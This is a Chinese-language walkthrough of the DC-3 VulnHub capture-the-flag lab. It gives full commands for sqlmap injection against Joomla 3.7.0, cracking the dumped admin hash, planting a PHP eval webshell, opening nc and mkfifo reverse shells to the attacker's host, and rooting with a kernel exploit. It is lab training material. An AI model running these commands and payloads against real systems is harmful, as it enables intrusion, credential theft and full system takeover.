Dc-3靶场详细过程

一、环境搭建：

1、靶场描述

DC-3是另一个专门建立的易受攻击的实验室，旨在获得渗透测试领域的经验。与之前的DC版本一样，这个版本是为初学者设计的，尽管这一次只有一个标志，一个入口点，根本没有线索。必须具备Linux技能并熟悉Linux命令行，还必须具有使用基本渗透测试工具的经验。对于初学者来说，谷歌可以提供很大的帮助，但你可以随时在@DCAu7上推我让你重新开始。但请注意:我不会给你答案，相反，我会给你一个如何前进的想法。对于那些有CTF和Boot2Root挑战经验的人来说，这可能不会花你很长时间(事实上，它可能只需要不到20分钟)。如果是这种情况，如果你想让它更具挑战性，你可以重做挑战，探索其他获得根和获得旗帜的方法。

2、下载靶场环境

    靶场下载地址：

https://www.vulnhub.com/entry/dc-32,312/

二、渗透靶场

1、目标：

    目标就是我们搭建的靶场，靶场IP为：192.168.176.0/24

2、信息收集：寻找靶机真实IP

nmap -sP 192.168.176.0/24

本机IP为192.168.176.129

所以分析可得靶场IP为192.168.176.132

192.168.176.1  vm8网卡

192.168.176.2  网关

192.168.176.132  靶机

192.168.176.254  DHCP服务器

192.168.176.129 kali本机

3、信息收集：探端口及服务

nmap -A -p- -v 192.168.176.132

-A 综合性扫描

-v 冗余模式。强烈推荐使用这个选项，它会给出扫描过程中的详细信息

我们可以看到80端口开放，存在web服务，Apache/2.4.18

3.网页信息探测

用火狐打开网页输入靶场IP地址访问网址http://192.168.176.132

页面显示必须获得权限

joomScan扫描

joomscan --url http://192.168.176.132提示没有joomscan选择y安装

然后我们知道了joomla cms版本为3.7.0

后面得到了网站地址http://192.168.176.132/administrator/

打开火狐页面搜索得到的地址

利用nikto扫描获取后台地址

    Nikto是一个开源的WEB扫描评估软件，可以对Web服务器进行多项安全测试，Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等。

后面输入nikto --ur http://192.168.176.132/

查找漏洞发现存在SQL注入

    我们前面知道了CMS为joomla，版本为3.7.0

使用searchsploit检查到有对应的漏洞

然后输入searchsploit joomla 3.7.0

我们发现有一个SQL注入，还存在一个XSS

我们可以看一下这个漏洞的提示信息

searchsploit -m 42033.txt

下面输入cat 42033.txt 信息如下图所示

把localhost修改为我们的靶机IP就ok

http://192.168.176.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

看到提示，数据库语句错误，说明进行了拼接，存在SQL注入

sqlmap跑出数据

1.跑出所有数据库

输入sqlmap-u

"http://192.168.176.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] –batch

扫描结果出来

成功把数据库跑出来

2.获取当前数据库的名字joomladb

输入sqlmap -u

"http://192.168.176.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db –batch

3.获取joomladb的users表

输入 sqlmap -u

"http://192.168.176.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables --batc

 观察表名，很明显，我们会关注#__users这张表

4.获取joomladb的users表的字段名

sqlmap -u

"http://192.168.176.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns

第一个输入y

第二个输入y

第三个随便输入

第四个输入10

成功跑出六个字段

5.获取目标字段username和password

sqlmap -u"http://192.168.176.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns -C "username,password" --dump --batch
获到一个用户名和加密的密码结果如下图：

6.利用john爆破密码snoopy

    使用john破解出admin密码，john the ripper是一款本地密码破解工具，可以从我们上面生成的shadow文件（密码散列）中破解出密码。破解时间取决于密码的复杂程度以及破解模式。

创建一个1.txt，把加密的密码字段写入

使用john破解出admin密码是snoopy

7.利用获取到的账号密码进行登录

http://192.168.176.132/administrator/

admin/snoopy

登陆成功

8.上传webshell

    发现一个上传点

点击Beez3 Details and Files进入

点击newfiles

这儿我们发现可以上传文件，考虑上传木马，也可以创建文件进行编辑

要上传木马，我们先要找到当前文件所在的目录：

在火狐上输入http://192.168.176.132/templates/beez3/html/点击回车显示目录

在回到刚才的页面点击new file
在html下创建一个php文件，名字叫做shell

创建成功之后，跳到编辑页面，然后我们输入php一句话，点击左上角绿色的save进行保存

<?php

echo ("密码是a");

@eval($_REQUEST [a]);

?>

在上火狐上访问http://192.168.176.132/templates/beez3/html/
发现多了一个shell.php文件，我们访问一下

访问webshell，得到我们设置的会先内容，文件上传成功

http://192.168.176.132/templates/beez3/html/shell.php

9.蚁剑管理webshell

    右键添加数据

点击右键进入虚拟终端执行whaomi查询我权限，是www-data权限

10.反弹shell到kali

输入nc -lvvp 1234

11.靶机连接

nc -e /bin/bash 192.168.176.129 1234

发现-e参数不可用

使用如下目录连接

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.176.129 1234 >/tmp/f

创建交互式shell

    经常用shell的都知道这个shell不好用，我们建立一个交互式shell

    常用的就是python创建交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

12.使用辅助脚本发现提权漏洞

下载辅助脚本Linux-Exploit-Suggester.sh

    下载地址：

GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing tool

上传辅助脚本

    我们直接在蚁剑中上传

上传成功

发现漏洞

ls -l linux-exploit-suggester.sh

发现没有执行权限，我们给他加个执行文件

输入chmod +x linux-exploit-suggester.sh

 执行脚本

输入./linux-exploit-suggester.sh

发现很多可利用漏洞

13.使用辅助脚本提权

    上面发现了很多漏洞，这里我们挑一个进行提权

挑选CVE-2016-4557

在图片里可以看到是一个39772的文件，由于给出的那个URL无法下载
 

也可以去searchsploit里面去看看  

地址根上面一样也不能使用

可以使用下面地址直接下载

bin-sploits/39772.zip · main · Exploit-DB / Binary Exploits · GitLab

提权

    解压文件

unzip 39772.zip

cd 33792

ls

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

执行完之后，提权成功

获得root权限

14.发现the-flag.txt

ls

cat the-flag.txt